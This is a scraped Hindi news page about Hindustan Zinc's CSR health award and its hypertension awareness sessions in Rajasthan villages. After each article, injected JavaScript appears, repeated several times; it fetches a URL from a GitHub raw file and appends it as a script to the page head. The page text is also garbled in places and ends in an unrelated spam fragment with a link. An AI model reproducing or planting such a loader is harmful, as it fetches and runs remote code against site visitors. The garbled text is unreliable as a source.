देश के एकमात्र और दुनिया का दूसरा सबसे बड़ा एकीकृत जस्ता-सीसा-चांदी उत्पादक कंपनी हिंदुस्तान जिंक को नई दिल्आयोजित पुरस्कार समारोह के दौरान छठे सीएसआर हैल्थ इम्पेक्ट पुरस्कार से सम्मानित किया। सीएसआर स्वास्थ्य अभियान श्रेणी में असाधारण प्रदर्शन के लिए कंपनी को अपनी प्रमुख सीएसआर परियोजना, खुशी आंगनवाड़ी नंदघर के लिए यह पुरस्कार प्रदान किया गया, जिससे राजस्थान के 5 जिलों उदयपुर, राजसमंद, चित्तौड़गढ़, भीलवाड़ा और अजमेर के 2,500 गांवों में 1,90,000 बच्चे लाभान्वित हुए।
इस पुरस्कार हेतु जूरी सदस्य राम बंद्योपाध्याय - आईएएस, कॉरपोरेट मामलों के पूर्व सचिव, आलोक रंजन - आईएएस, पूर्व मुख्य सचिव, उत्तर प्रदेश सरकार, डॉ चंद्रकांत पांडव - पब्लिक हेल्थ एक्सपर्ट, एस श्रीधर, मैनेजिंग डायरेक्टर फाइजर इंडिया और प्रेसिडेंट ओपीपीआई, डॉ फरहत मंटू - जनरल डायरेक्टर, एमएसएफ दक्षिण एशिया, डॉ रंजना कुमारी - निदेशक, सामाजिक अनुसंधान केंद्रय मैथय ेिन- ो्ड अध्यक्ष, केयर इंडिया, सौमिल मोदी - कंट्री हेड, जनरल मैनेजर, नोवार्टिस ऑन्कोलॉजी, इंडियाय और विजय सेठी - डिजिटल ट्रांसफॉर्मेशन, सस्टेनेबिलिटी इंजीलवादी थे।
समारोह के मुख्य अतिथि भारत के केंद्रीय स्वास्थ्य और परिवार कल्याण मंत्री मनसुख मंडाविया और े सामाजिक न्याय और अधिकारिता मंत्री रामदास अठावले थे। हिन्दुसतान जं़ क ओ स यह पुरस्कार सीएसआर विभाग के अधिकारी योगेश वर्मा एवं अंजली असीजा ने ग्रहण किया।
सीएसआर हेल्थ इम्पैक्ट अवार्ड इंटीग्रेटेड हेल्थ एंड वेलबीइंग काउंसिल की एक पहल है, जिसका उद्देश्य व्यवसायों को राष्ट्रव्यापी सीएसआर आधारित स्वास्थ्य अभियाना का नेतृत्व करने के लिए प्रेरित करना और अन्य कॉर्पोरेट को बड़े पैमाने र शािल होने की अील रनाहै, जिससे यह अभियान और मजबूत हसे। हिन्दुस्तान जिं़क द्वारा खुशी अभियान के अंतर्गत आंगनवाड़ी कार्यकर्ताओं और पूरे समुदाय पर कोविड-19 के प्रभाव का अध्ययन करने के लिए डिप स्टिक मूल्यांकन किया। कोविड 19 और उसके उपरान्त प्री-स्कूल शिक्षा की निरंतरता सुनिश्चित करने के लिए, व्हाट्सएप के माध्यम से प्रीस्कूल शिक्षा सामग्री और शिक्षण शिक्षण सामग्री वालेवीडयो ाझाकिए सामदायि जुड़ाव को मजबूत करने के लिए घर घर जाकर जागरूक किया। इसके अलावा कार्यक्रम का मुख्य फोकस ग्रामीण बच्चों की पोषण स्थिति में सुधार लाने और समुदाय के स्वास्थ्य और स्वच्छता पहलुओं को मजबूत करने पर है।
हिंदुस्तान जिंक का मानना है कि सभी का स्वास्थ्य सर्वोच्च प्राथमिकता है और सभी व्यवसायों को देश के समग्र स्वास्थ्य को बेहतर बनाने ा प्रयास करना चाहिए। अपने संचालन और आम जनता के आसपास रहने वाले लोगों के स्वास्थ्य और कल्याण को सुनिश्चित करने के लिए कंपनी की प्रतिबद्धता को समय समय पर सम्मानित किया गया है।;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head').appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src =...
हिन्दुस्तान जिंक द्वारा संचालित स्वास्थ्य सेवा परियोजना के तहत् विश्व हाइपरटेंशन दिवस के अवसर पर हाइपरटेंशन से बचाव के बारें में पन क्षेत्र के आस पास के गावों में जागरूकता सत्र आयोजित कर गा्रमीणों को इस बारें में जानकारी प्रदान की। बच्चे, वयस्क और बुजुर्ग सभी एनसीडी में योगदान करने वाले जोखिम कारकों की चपेट में हैं, जिसकें कारण अस्वास्थ्यकर आहार, शारीरिक निष्क्रियता, तंबाकू के धुएं के संपर्क में आने या शराब के हानिकारक उपयोग हैं। हाइपरटेंशन की गंभीरता के बारे में समुदाय में जागरूकता लाे के िए उन्हें लक्षणों, लक्षणों, कारणों और उपचारों के बारे में जानकारी प्रदान की गयी। उदयपुर के जावर चित्तौड़गढ़ के चंदेरिया और भीलवाड़ा में रामपुरा आगुचा माइंस के आस-पास के गांवों में हिन्दुस्तान जिं़क द्वारा दीपक फाउंडेशन के सहयोग से संचालित मोबाइल हेल्थ यूनिट से इन सत्रों का आयोजन किया गया। इससे अमरपुरा, बोरिकुवा, नगरी, गुसाई खेड़ा, इंद्र का खेड़ा और परशुरामपुा ावं 200स धक ग्रामीण लाभान्वित हुए।;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head').appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src =...
It’s important to note that there are several different types of https://w-shakespeare.ru/tragedy/etragedy3.htmls that are created for different reasons. For example, the year-end statement that...